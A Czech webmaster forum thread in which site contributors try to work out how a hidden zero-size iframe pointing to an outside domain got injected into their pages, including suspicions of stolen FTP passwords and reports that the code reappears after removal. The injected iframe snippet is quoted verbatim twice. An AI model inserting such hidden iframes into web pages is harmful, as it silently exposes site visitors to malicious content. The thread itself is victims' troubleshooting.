Autor Zpráva
Gekon
Profil
Začal jsem spolupracovat s herním serverem Vokr.com. Byla mi svěřena jistá práce v sekci stalker.Vokr.com, konkrétně přidání jedné stránky, kterou jsem sám psal a přidání odkazu na tuto stránku do indexu.
Hesla do administrace a na FTP (btw heslo bylo strašně triviální, které bych uhodl snad i bez toho, že mi ho admin řekl) mi byla sdělena po ICQ (já Miranda, admin QIP).
Na FTP jsem se připojoval pomocí TCMD 7.
Dnes ráno mě administrátor obvinil, že jsem do indexu ještě před DTD přidal tento kód:
<iframe src="http://garami.org/" width="0" height="0" style="display:none"></iframe>
Je možné, že nějaký spyware, nejspíš keylogger vyzkoumal, že se jedná o důležitá přístupová hesla a poslal je třetí straně?
Za normálních okolností by to asi nebyl problém z logů zjistit, problém je v tom, že používají jakýsi podivný samodomo CMS, který logy nemá a nemají ponětí o tom, jestli je má webhoster.

Nějaké nápady, připomínky apod.? Právě projíždím počítač Ad-Awarem a zatím 4 kritické soubory. NOD 32 spouštím jednou týdně kvůli aktualizacím a testům. Firewall mám standardní Windowsácký. Nejedná se o ten bazmek z XPček, ale o poměrně kvalitní Vista fwall.
Petr Tichý
Profil
Spíš bych se přikláněl, že někdo to heslo uhodl, když říkáš že je simple, nebo to udělal někdo zevnitř. Neřekl bych, že to někdo odchytil.
Gekon
Profil
Petr Tichý
Heslo na FTP bylo trošku složitější než to do administrace. V administraci šlo akorát přidávat novinky.
Gekon
Profil
Tak Ad-Aware po úplném testu (zkoumal přes tři miliony souborů) našel akorát 4 tracking cookie, což je nic. NOD 32 nenašel vůbec nic a McAfee Avert Stinger taky nic.
Bubák
Profil
Pokud jste hesla nezměnili, tak bych to nyní vřele doporučoval.
DJ Miky
Profil
A nemohlo to být třeba způsobeno nějakou dírou v jejich administračním systému?
Gekon
Profil
Bubák
Jistěže už jsou dávno změněná. Problém je v tom, že admin si myslí, že ten spammer jsem já, takže já je neznám:((

DJ Miky
V administraci se akorát přidávají novinky, ankety apod., k FTP se nijak nedostaneš.
pEeLL
Profil
podle toho co ctu tak mi pripada ze to tam naschval pridal nekdo ztech co tam maji pristup. ale proc to netusim.
prijde mi ze nekdo cizi kdo by ziskal pristup by toho vyuzil mnohem lip.

navic pokud bezne neobchazis hromady porno a warez stranek mas antivir a byt zakladni firewall tak zas nebude tak lehke ti krast hesla.
Gekon
Profil
pEeLL
Na warez ani na porno nechodím vůbec, takže odtud vítr nevane. Asi bude pravděpodobnější, že mě někdo chtěl zdriskreditovat.
kulový blesk
Profil *
Tak to svinstvo mo do stránek proniklo taky.
Vždycky to smažu, nahraju na ftp znovu, zkontroluju a je vše ok.
Za pár hodin je ale vše z I-framu zase smazáno...
(viz: www.kulovy-blesk.com)

Nevím s čím to může souviset.
Že by počítadlo CNW nebo server Forpsi?

Pokud budete někdo vědět, moc děkuji za radu...
Gekon
Profil
kulový blesk
To zní zajímavě. Mohl bys prosím někdy vyfotit zdroják, nijak to neupravovat a hodit někam na net? Byl bych ti moc vděčný.
kulový blesk
Profil *
Momentálně jsem to přímo na serveru (přes FTP) smazal, a přesto stránka nefunguje.
To, co bylo za </html>
bylo:
<!-- ~ --><iframe src="http://garami.org/" width="0" height="0" style="display:none"></iframe><!-- ~ -->

Zajímavé je i podívat se na whois, komu patří doména garami, i město, kde se nachází registrace :-)

Má to být Said Mahmod z Reeayad...
PVD
Profil *
Jsem autorem "RS" na zmíněném webu. Ano, heslo je triviální, ale nastavené z mé výroby, nikdy jsem nikomu nebránil ho změnit, dá se změnit na jakékoliv mnohem složitější.
Přes mé RS se takto do indexu, kde byl iframe umístěn, dostat nemůže. Je to nereálné a v podstatě nemožné.
Věřím Ti, Gekone, že jsi to tam nedal. Ale moc lidí přístup nemá a jak tu někdo řekl, pokud by se tam někdo cizí dostal, tak toho využije víc. ;)
Uvidímě co po změně hesla, každopádně by to chtělo najít co má společného web stalker.vokr.com a kulovy-blesk.com... možná najdeme něco, co to způsobuje.
Jinak jsem autorem i kódu daného webu a jsou tam i PHP scripty na stránkování apod., ovšem vše je to nezávadné, tím jsem si na 99% jistý. Heslo na FTP je složité, to tedy bych neřekl že je jednoduché. ;)
A sledovat hesla může nějaký sviňák (program) i u ostatních z redakce, každopádně je dobře, že jsi si zkontroloval vše u sebe, nyní musíme hledat jinde..

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: